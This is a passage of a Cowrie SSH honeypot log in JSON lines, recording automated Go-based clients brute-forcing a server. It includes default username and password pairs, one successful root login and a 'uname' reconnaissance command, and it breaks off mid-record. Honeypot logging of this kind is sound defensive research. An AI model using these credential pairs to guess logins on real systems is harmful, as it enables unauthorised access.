{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:31.975301Z","src_ip":"212.227.235.229","session":"275e84ee2c14"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:32.748589Z","src_ip":"212.227.235.229","session":"275e84ee2c14"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:34.008311Z","src_ip":"212.227.235.229","session":"275e84ee2c14"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":60543,"dst_ip":"1.2.3.4","dst_port":22,"session":"a069236f09fb","protocol":"ssh","message":"New connection: 45.125.211.194:60543 (1.2.3.4:22) [session: a069236f09fb]","sensor":"my-vps","timestamp":"2025-08-28T03:31:36.045839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:36.046857Z","src_ip":"45.125.211.194","session":"a069236f09fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:36.308955Z","src_ip":"45.125.211.194","session":"a069236f09fb"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:36.971084Z","src_ip":"45.125.211.194","session":"a069236f09fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53532,"dst_ip":"1.2.3.4","dst_port":22,"session":"48a8ea483304","protocol":"ssh","message":"New connection: 212.227.235.229:53532 (1.2.3.4:22) [session: 48a8ea483304]","sensor":"my-vps","timestamp":"2025-08-28T03:31:37.841339Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:37.842552Z","src_ip":"212.227.235.229","session":"48a8ea483304"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:38.193116Z","src_ip":"45.125.211.194","session":"a069236f09fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53086,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d7c9919258","protocol":"ssh","message":"New connection: 212.227.125.160:53086 (1.2.3.4:22) [session: 93d7c9919258]","sensor":"my-vps","timestamp":"2025-08-28T03:31:40.885840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:40.886550Z","src_ip":"212.227.125.160","session":"93d7c9919258"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:41.102704Z","src_ip":"212.227.125.160","session":"93d7c9919258"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:41.751353Z","src_ip":"212.227.125.160","session":"93d7c9919258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11796,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d82a1b8ad5a","protocol":"ssh","message":"New connection: 212.227.125.160:11796 (1.2.3.4:22) [session: 7d82a1b8ad5a]","sensor":"my-vps","timestamp":"2025-08-28T03:31:42.367879Z"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:42.968828Z","src_ip":"212.227.125.160","session":"93d7c9919258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35292,"dst_ip":"1.2.3.4","dst_port":22,"session":"706d639ccce7","protocol":"ssh","message":"New connection: 212.227.125.160:35292 (1.2.3.4:22) [session: 706d639ccce7]","sensor":"my-vps","timestamp":"2025-08-28T03:31:46.621945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:46.622899Z","src_ip":"212.227.125.160","session":"706d639ccce7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:46.842045Z","src_ip":"212.227.125.160","session":"706d639ccce7"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:47.498284Z","src_ip":"212.227.125.160","session":"706d639ccce7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:48.724890Z","src_ip":"212.227.125.160","session":"706d639ccce7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46180,"dst_ip":"1.2.3.4","dst_port":22,"session":"e53e45f9abc5","protocol":"ssh","message":"New connection: 212.227.235.229:46180 (1.2.3.4:22) [session: e53e45f9abc5]","sensor":"my-vps","timestamp":"2025-08-28T03:31:49.772351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:49.773356Z","src_ip":"212.227.235.229","session":"e53e45f9abc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:50.021027Z","src_ip":"212.227.235.229","session":"e53e45f9abc5"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:50.766389Z","src_ip":"212.227.235.229","session":"e53e45f9abc5"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22323,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cd3f45d91cf","protocol":"ssh","message":"New connection: 45.125.211.194:22323 (1.2.3.4:22) [session: 4cd3f45d91cf]","sensor":"my-vps","timestamp":"2025-08-28T03:31:50.793176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:50.806138Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:51.004965Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:31:51.848254Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:52.015836Z","src_ip":"212.227.235.229","session":"e53e45f9abc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:31:52.287931Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:31:52.288646Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:52.499992Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:31:52.501051Z","src_ip":"45.125.211.194","session":"4cd3f45d91cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56172,"dst_ip":"1.2.3.4","dst_port":22,"session":"81ffcabab641","protocol":"ssh","message":"New connection: 212.227.125.160:56172 (1.2.3.4:22) [session: 81ffcabab641]","sensor":"my-vps","timestamp":"2025-08-28T03:31:58.648086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:31:58.649416Z","src_ip":"212.227.125.160","session":"81ffcabab641"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:31:58.865255Z","src_ip":"212.227.125.160","session":"81ffcabab641"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T03:31:59.515410Z","src_ip":"212.227.125.160","session":"81ffcabab641"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:00.733480Z","src_ip":"212.227.125.160","session":"81ffcabab641"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38824,"dst_ip":"1.2.3.4","dst_port":22,"session":"2284d166bbd1","protocol":"ssh","message":"New connection: 212.227.235.229:38824 (1.2.3.4:22) [session: 2284d166bbd1]","sensor":"my-vps","timestamp":"2025-08-28T03:32:01.478615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:01.479775Z","src_ip":"212.227.235.229","session":"2284d166bbd1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:01.738513Z","src_ip":"212.227.235.229","session":"2284d166bbd1"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T03:32:02.514182Z","src_ip":"212.227.235.229","session":"2284d166bbd1"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:32:03.774408Z","src_ip":"212.227.235.229","session":"2284d166bbd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38382,"dst_ip":"1.2.3.4","dst_port":22,"session":"173af8981fb2","protocol":"ssh","message":"New connection: 212.227.125.160:38382 (1.2.3.4:22) [session: 173af8981fb2]","sensor":"my-vps","timestamp":"2025-08-28T03:32:05.493274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:05.494390Z","src_ip":"212.227.125.160","session":"173af8981fb2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:32:05.717458Z","src_ip":"212.227.125.160","session":"173af8981fb2"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":23652,"dst_ip":"1.2.3.4","dst_port":22,"session":"b73b300b9776","protocol":"ssh","message":"New connection: 45.125.211.194:23652 (1.2.3.4:22) [session: b73b300b9776]","sensor":"my-vps","timestamp":"2025-08-28T03:32:05.769182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:32:05.778142Z","src_ip":"45.125.211.194","session":"b73b300b9776"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh